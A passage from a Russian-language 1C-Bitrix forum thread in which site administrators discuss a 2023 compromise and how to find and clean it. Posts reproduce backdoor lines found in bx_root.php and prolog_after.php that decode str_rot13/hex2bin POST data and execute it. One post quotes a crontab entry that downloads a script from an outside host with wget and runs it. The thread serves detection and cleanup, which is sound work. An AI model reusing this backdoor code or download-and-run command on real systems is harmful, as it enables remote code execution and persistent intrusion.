1С-Битрикс Разработчикам

Заглянувший

Сообщений: 3 Регистрация: 24.04.2020

#441

02.03.2023 15:49:08

Цитата
написал: Коллеги, для контроля целостности используйте штатный механизм Контроль целостности файлов /bitrix/admin/security_file_verifier.php

на \bitrix\modules\main\bx_root.php не сработал механизм

Пользователь 47602

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 24.08.2009

#442

02.03.2023 16:05:50

Цитата
написал: на \bitrix\modules\main\bx_root.php не сработал механизм

я так понял, до конца так и не определились, родной тот код в конце или вредоносный.

у меня еще в \bitrix\components\bitrix\player\mediaplayer\skins\five\display\index.php подозрительный код был, возможно с именно этой атакой не связано.

Товарищи, те кто успешно лечит, сориентируйте пожалуйста по ценам на эту услугу + обновление до актуальных версий битрикса. Свежий бекап есть, но возможно он тоже с закладками.

Евгений Жуков

Администратор

Сообщений: 9437 Баллов: 1828 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#443

02.03.2023 16:14:24

Цитата
написал: родной тот код в конце или вредоносный.

Вредоносный

Не надо сверлить зубы через задний проход дрелью от Сваровски

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#444

02.03.2023 17:20:22

Цитата

Евгений Жуков написал:

Цитата
написал: родной тот код в конце или вредоносный.

Вредоносный

Какие люди в наш топик пожаловали

Евгений Жуков, welcome !

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#445

02.03.2023 17:35:45

к ознакомлению про /bitrix/modules/main/bx_root.php

Цитата
<? define("BX_ROOT", "/bitrix"); if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "") define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]); else define("BX_PERSONAL_ROOT", BX_ROOT);

остальное лишнее!

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 2663075 Постоянный посетитель Сообщений: 93 Баллов: 17 Регистрация: 20.11.2018	#446 0 02.03.2023 17:46:06 Дополнение: Сегодня обнаружили что под типа нормальный код маскируется вирусняк. причем с кучей комментов код Оптимизация скорости работы сайта и Оптимизация для сео (техническая оптимизация)

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#447

02.03.2023 18:36:04

Цитата
Алексей написал: Дополнение: Сегодня обнаружили что под типа нормальный код маскируется вирусняк. причем с кучей комментов код

Код в студию ... (в спойлер плиз)
и файл, где собственно обнаружен

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Евгений Жуков

Администратор

Сообщений: 9437 Баллов: 1828 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#448

02.03.2023 18:36:42

Цитата
написал: Какие люди в наш топик пожаловали

Изначально незримо присутствовали

Не надо сверлить зубы через задний проход дрелью от Сваровски

Пользователь 3657558

Заглянувший

Сообщений: 6 Регистрация: 24.10.2019

#449

02.03.2023 19:30:21

рекомендую всем поискать закладки по шаблону:

Код
"str_rot13"

например:

Код
grep -r str_rot13 *

это выдаст примерно такой результат:

Код

bitrix/managed_cache/MYSQL/user_option/2b/2b1669a4c0fbb6f71b056d5801fb9824.php:$ser_content = 'a:2:{s:7:"CONTENT";s:0:"";s:4:"VARS";a:1:{s:6:"query1";s:16:"greps
tr_rot13 *";}}';
bitrix/modules/main/bx_root.php:#       parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))
);                                                                                                                                                                           
bitrix/modules/main/bx_root.php:#       parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))
);                                                                                                                                                                           
bitrix/modules/main/include/prolog_after.php:   CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
bitrix/modules/main/include/prolog_after.php:   CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
bitrix/modules/main/include/prolog_after.php:   CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
bitrix/modules/main/include/prolog_after.php:   CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
bitrix/modules/main/classes/general/vuln_scanner.php:                           'str_rot13',
bitrix/modules/socialnetwork/lib/item/logindex.php:             return str_rot13($str);

bitrix/managed_cache/MYSQL/ --- это я средствами битрикс искал, это всё ок
bitrix/modules/main/classes/general/vuln_scanner.php --- там и должно быть
bitrix/modules/socialnetwork/lib/item/logindex.php --- вроде должен быть, но модуль не использую, закоментировал.

ну а остальное закладки!

Пользователь 3705366 Заглянувший Сообщений: 7 Регистрация: 12.11.2019	#450 0 02.03.2023 19:37:23 На cron (crontab -u bitrix -e) эти клоуны вешают выполнение команд: /15 * * * wget -q -O xxxd http://hello.hellodolly777.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/bitrix/

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером